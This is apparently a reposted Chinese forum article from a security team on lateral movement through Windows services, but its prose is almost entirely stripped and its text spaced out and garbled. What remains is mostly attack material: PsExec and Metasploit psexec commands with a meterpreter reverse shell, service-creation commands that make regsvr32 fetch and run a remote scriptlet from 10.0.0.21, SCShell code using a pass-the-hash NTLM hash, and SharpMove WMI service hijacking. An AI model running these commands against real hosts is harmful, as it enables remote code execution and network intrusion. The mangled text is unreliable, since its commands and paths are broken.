[28784] 2021-02-27_横向渗透测试–服务

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-19
2021-02-27_横向渗透测试–服务 O t s   2 0 2 1 - 0 2 - 2 7 / P s E x e c 使 M i c r o s o f t 访 S M B P s E x e c 使 U N C   p e n t e s t l a b . e x e   M e t e r p r e t e r M e t a s p l o i t   F r a m e w o r k S M B P s E x e c 使 M e t a s p l o i t     P s E x e c P o w e r S h e l l i m p a c k e t - s m b s e r v e r   p e n t e s t l a b   / m s b u i l d   - s m b 2 s u p p o r t P s E x e c 6 4 . e x e   P C 1   - u   p e n t e s t l a b   - p   P a s s w o r d 1 2 3   c m d . e x e   / c   1 0 . 0 . 0 . 2 1 p e n t e s t l a b p e n t e s t l a b . e x e u s e   e x p l o i t / w i n d o w s / s m b / p s e x e c s e t   p a y l o a d   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p s e t   L P O R T   < L o c a l   P o r t > s e t   L H O S T   < L o c a l   I P > s e t   S M B U S E R   < l o c a l   a d m i n   u s e r n a m e > s e t   S M B P A S S   < l o c a l   a d m i n   p a s s w o r d > e x p l o i t
M e t a s p l o i t     P s E x e c   M e t e r p r e t e r 使 使 使 使 P s E x e c S O C P s E x e c   S C . e x e M i c r o s o f t 使 W i n d o w s P s E x e c W i n d o w s M e t e r p r e t e r     S C U n 1 k 0 d 3 r S C S h e l l 使 . N E T 使   O p e n S C M a n a g e r     A P I A P I M i c r o s o f t 使 使 使 r e g s v r 3 2 s c   P C 1   c r e a t e   p e n t e s t l a b   b i n p a t h =   " C : W i n d o w s S y s t e m 3 2 r e g s v r 3 2 . e x e   / s   / n   / u   / i : h t t p : / / 1 0 . 0 . 0 . 2 1 : 8 0 8 0 / p e n t e s t l a b . s c t   s c r o b j . d l l " s c   P C 1   s t a r t   p e n t e s t l a b [ D l l I m p o r t ( " a d v a p i 3 2 . d l l " ,   E n t r y P o i n t   =   " O p e n S C M a n a g e r W " ,   E x a c t S p e l l i n g   =   t r u e ,   C h a r S e t   =   C h a r S e t . U n i c o d e ,   S e t L a s t E r r o r   =   t r u e ) ]           p u b l i c   s t a t i c   e x t e r n   I n t P t r   O p e n S C M a n a g e r (                   s t r i n g   l p M a c h i n e N a m e ,                     s t r i n g   l p D a t a b a s e N a m e ,                     u i n t   d w D e s i r e d A c c e s s ) ; S C S h e l l . e x e   1 0 . 0 . 0 . 1 1   X b l A u t h M a n a g e r   " C : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   C : w i n d o w s s y s t e m 3 2 r e g s v r 3 2 . e x e   / s   / n   / u   / i : h t t p : / / 1 0 . 0 . 0 . 2 1 : 8 0 8 0 / p e n t e s t l a b . s c t   s c r o b j . d l l "   .   p e n t e s t l a b   P a s s w o r d 1 2 3
  S C S h e l l   M e t e r p r e t e r P y t h o n S C S h e l l   使   D C E R P C   S M B   S C S h e l l   P y t h o n 使 W M I 便 S h a r p M o v e   S C S h e l l   U N C d e f   r u n (                 s e l f ,                 r e m o t e N a m e ,                 r e m o t e H o s t ,                 s e r v i c e N a m e ,                 n o C m d ,                 ) :                 e x i t C l i   =   F a l s e                 s t r i n g B i n d i n g   =   e p m . h e p t _ m a p ( r e m o t e N a m e ,   s c m r . M S R P C _ U U I D _ S C M R ,   p r o t o c o l = ' n c a c n _ i p _ t c p ' )                 r p c t r a n s p o r t   =   t r a n s p o r t . D C E R P C T r a n s p o r t F a c t o r y ( s t r i n g B i n d i n g )                 l o g g i n g . d e b u g ( ' b i n d i n g   t o   % s '   %   s t r i n g B i n d i n g )                 r p c t r a n s p o r t . s e t _ c r e d e n t i a l s ( p y t h o n 3   s c s h e l l . p y   p e n t e s t l a b o r a t o r i e s / p e n t e s t l a b @ 1 0 . 0 . 0 . 1 1   - h a s h e s   a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 5 8 a 4 7 8 1 3 5 a 9 3 a c 3 b f 0 5 8 a 5 e a 0 e 8 f d b 7 1 C : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   C : w i n d o w s s y s t e m 3 2 r e g s v r 3 2 . e x e   / s   / n   / u   / i : h t t p : / / 1 0 . 0 . 0 . 2 1 : 8 0 8 0 / p e n t e s t l a b . s c t   s c r o b j . d l l s t a t i c   M a n a g e m e n t S c o p e   W M I C o n n e c t ( s t r i n g   h o s t ,   s t r i n g   u s e r n a m e ,   s t r i n g   p a s s w o r d )   {     s t r i n g   w m i N a m e S p a c e   =   " r o o t C I M v 2 " ;     C o n n e c t i o n O p t i o n s   o p t i o n s   =   n e w   C o n n e c t i o n O p t i o n s ( ) ;     C o n s o l e . W r i t e L i n e ( " r n     H o s t                                                       :   { 0 } " ,   h o s t ) ;     i f   ( ! S t r i n g . I s N u l l O r E m p t y ( u s e r n a m e ) )     {           C o n s o l e . W r i t e L i n e ( " [ + ]     U s e r   c r e d e n t i a l s                               :   { 0 } " ,   u s e r n a m e ) ;           o p t i o n s . U s e r n a m e   =   u s e r n a m e ;           o p t i o n s . P a s s w o r d   =   p a s s w o r d ;     } S h a r p M o v e . e x e   a c t i o n = m o d s v c   c o m p u t e r n a m e = P C 1   c o m m a n d = " c m d . e x e   / c   1 0 . 0 . 0 . 2 1 p e n t e s t l a b p e n t e s t l a b . e x e "   a m s i = t r u e   s e r v i c e n a m e = p e n t e s t l a b   u s e r n a m e = p e n t e s t l a b   p a s s w o r d = P a s s w o r d 1 2 3
  S h a r p M o v e S M B R P C W M I 使 使 使 S O C h t t p s : / / a t t a c k . m i t r e . o r g / t e c h n i q u e s / T 1 0 2 1 / 0 0 2 / h t t p s : / / g i t h u b . c o m / 0 x t h i r t e e n / S h a r p M o v e h t t p s : / / g i t h u b . c o m / M r - U n 1 k 0 d 3 r / S C S h e l l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则